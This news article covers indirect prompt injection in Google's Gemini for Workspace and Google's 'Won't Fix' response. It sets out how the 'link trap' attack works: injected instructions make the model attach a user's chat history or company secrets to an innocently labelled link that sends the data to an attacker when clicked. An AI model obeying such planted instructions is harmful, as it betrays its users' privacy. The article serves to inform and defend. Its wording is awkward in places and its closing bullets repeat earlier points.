Gmail's Security Concerns Have Been Verified and Google Shuns Rectification—Underlying Reasons Provided
Update, Jan. 3, 2025: This narrative, initially published Jan. 2, now encompasses details of another below-the-surface prompt injection assault named a link trap, in addition to the indirect prompt injection danger posed to Gmail users.
Gmail's end-users are quite fond of the user-friendly functions that make interacting with the world's foremost email service, hoarding an astonishing 2.5 billion accounts, such a breeze. The integration of Gemini AI into Workspace, covering a multitude of Google products, further elevated the email experience. However, as cybersecurity specialists unveiled security problems and demonstrated how such threats could materialize across platforms like Gmail, Google Slides, and Google Drive, one might wonder why Google viewed this as not a security concern and classified it as a "Won't Fix (Intended Behavior)" ticket. During my investigation, I've discovered some intriguing facts that might pique your interest.
The Gemini AI Security Imperfection Demystified
Throughout 2024, we bore witness to numerous news items focusing on AI-driven attacks against Gmail users, ranging from the sensational account of a security expert narrowly escaping being another hacking victim, to Google's own security alerts inadvertently attacking its users, and, as the year drew to a close, a warning from Google itself about a second wave of attacks targeting Gmail users. However, the hidden gem among these tales was a technical security analysis that caught my attention, leaving me questioning why an issue with potentially catastrophic security repercussions wasn't being addressed: "Gemini is vulnerable to indirect prompt injection attacks," the report indicated, describing how these attacks "can occur across platforms like Gmail, Google Slides, and Google Drive, enabling phishing attempts and manipulating the chatbot's behavior."
Security researchers Jason Martin and Kenneth Yeung shared their findings as part of the responsible disclosure process. "This and other prompt injections in this blog were reported to Google, who decided not to track it as a security issue and marked the ticket as a Won't Fix (Intended Behavior)," they stated.
Some users recommended that Gmail's smart features be disabled, while others wondered how they could opt-out of AI reading their private email messages. As a result, I investigated further and consulted with my Google contacts.
In Plain English: The Gemini AI Prompt Injection Issue
If you have the time, I'd advise reading the HiddenLayer Gemini AI security analysis in its entirety. Nonetheless, I've distilled the security imperfection into the most succinct and compact form possible.
Like most advanced language models, Google's Gemini AI is prone to indirect prompt injection assaults. "Under specific circumstances," the report explained, "users can manipulate the assistant to produce misleading or unwanted responses." While the misleading part might seem unremarkable, the indirect aspect is crucial. This vulnerability enables third-parties to assume control of a language model by embedding the prompt into "less apparent channels," such as documents, emails, or websites.
Considering that attackers could disseminate malicious documents and emails to target accounts, compromising the integrity of the responses generated by the affected Gemini instance, things start to resemble a suspenseful thriller indeed.
"By providing detailed proof-of-concept examples," the researchers demonstrated, "we were able to illustrate how these attacks can occur across platforms like Gmail, Google Slides, and Google Drive." Particularly, the report discussed phishing via Gemini in Gmail, tampering with data in Google Slides, and polluting Google Drive locally and with shared documents. "These examples demonstrate that outputs from the Gemini for Workspace suite can be compromised," the researchers concluded, spelling out some serious concerns regarding the integrity of these products.
The Link Trap Attack: Revealed by Security Researchers
Senior Staff Engineer Jay Liao from Trend Micro recently shed light on another prompt injection attack that LLM users need to be apprised of: the link trap.
The severity of the link trap LLM prompt injection attack is that it may, under certain circumstances, compromise sensitive data for either the user or an organization, even when the AI lacks any external connectivity capabilities. The methodology might seem straightforward despite the underlying technology's complexity.
Liao presents an illustration of a hypothetical user asking the AI for details about airports in Japan before their impending visit. However, the prompt injection in this scenario includes malicious instructions to return a clickable link of the attacker's choosing. The user then clicks on the link but unwittingly activates the prompt injection attack, exposing sensitive data.
Liao discussed how, for a public generative AI attack, the prompt injection content might focus on "collecting the user's chat history, such as personal information, travel plans, or schedules." Conversely, for private instances, the prompt injection could seek out "internal passwords or confidential internal documents provided by the company to the AI." The second stage involves providing the link itself, which can direct the AI to append sensitive data to it, masking the actual URL behind a generic link to dispel any suspicion. "Once the user clicks the link," Liao explained, "the information is sent to a remote attacker."
The example discussed earlier could provide trustworthy insights about Japan, despite the initial response potentially containing such information.
The link in question might contain sensitive data, and to entice users to click, it might be disguised with harmless phrases like "reference" or other reassuring terms.
In a typical prompt injection attack, user permissions are required to inflict significant damage, such as sending emails or modifying databases. However, reducing these permissions is a method for controlling the extent of such attacks' impact. The link trap scenario, as Liao explained, deviates from this common understanding: "Even when we don't permit the AI to interact further with the external world and only permit it to execute basic tasks like addressing received information and queries, sensitive information can still be disclosed." This is due to the victim, the user, inherently having more permissions than the AI, according to Liao.
In response to concerns about Gmail prompt injection attacks, I reached out to my Gmail contacts, and a Google spokesperson provided the following insights:
"We've consistently prioritized defending against attacks like this, and we've implemented numerous robust measures to safeguard users, such as security checks to resist prompt injection attacks and misleading responses. We continuously strengthen our defenses through red-team exercises that train our models to counteract these types of attacks."
A more in-depth conversation with Gmail contacts revealed the following information that all Gmail users need to consider for security and Google's AI capabilities:
- These vulnerabilities are not unprecedented and persist in LLMs throughout the industry.
- When launching any new LLM-based project, Google carries out internal and external security testing to meet user requirements as well as its own safety criteria.
- Security testing includes evaluations from the Google AI Red Team on prompt attacks, training data extraction, backdooring the model, adversarial examples, data poisoning, and exfiltration.
- Google also integrates AI into its Vulnerability Rewards Program, which has specific guidelines for AI bug reports to help enhance the community's capacity to test the safety and security of Google AI products.
- Furthermore, Gmail and Drive incorporate powerful spam filters and user input validation, which help to shield against hostile injections of malicious code into Gemini.
- Despite the integration of Gemini AI into Gmail and other Google products, security researchers have highlighted a vulnerability that makes these platforms susceptible to indirect prompt injection attacks, which can enable phishing attempts and manipulate the chatbot's behavior.
- Google classified this Gemini AI security issue as "Won't Fix (Intended Behavior)" in a ticket, leading some users to question Google's view on the matter.
- In response to concerns about Gmail prompt injection attacks, a Google spokesperson confirmed that they have prioritized defense against such attacks and have implemented numerous security measures to safeguard users, such as resisting prompt injection attacks and misleading responses.
- Security testing for LLM-based projects at Google includes evaluations from the Google AI Red Team on prompt attacks, training data extraction, backdooring the model, adversarial examples, data poisoning, and exfiltration.
- While the Gemini AI vulnerability is not unique to Gmail, users can take precautions to enhance their security, such as disabling certain smart features and being vigilant against phishing attempts, especially those involving links or clickable content.